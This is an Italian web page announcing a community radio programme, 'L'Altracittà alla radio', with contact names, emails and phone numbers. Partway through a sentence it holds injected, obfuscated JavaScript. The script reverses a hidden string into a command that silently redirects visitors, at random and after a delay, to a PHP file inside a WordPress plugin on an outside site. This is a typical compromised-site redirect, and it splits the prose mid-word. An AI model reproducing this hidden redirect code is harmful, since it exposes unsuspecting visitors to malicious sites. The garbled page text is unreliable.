L’ Altracittà alla radio – nuova edizione

image_pdfimage_print

L’Altracittà riparte dal basso e dà il microfono alle persone “normali”, che normalmente cercano un senso all’esistenza, non rassegn (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andosi alla “normale” ingiustizia, ma dandosi da fare per il cambiamento, prima di tutto per una normale, personale e stringente necessità.
Niente ospiti famosi ma solo gente comune che racconta la propria storia, le proprie scelte e i propri sogni, lontani da parole come potere, successo, denaro, stupidità.
Per collaborare all’evoluzione di questo progetto o fare proposte o semplicemente contattarci:
g.vannini@comune.firenze.it – Gabriele Vannini, tel. 055/2767103, rderi@blu.it – Roberto Deri,
redazione@altracitta.org – Cecilia Stefani, tel. 055/601790.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *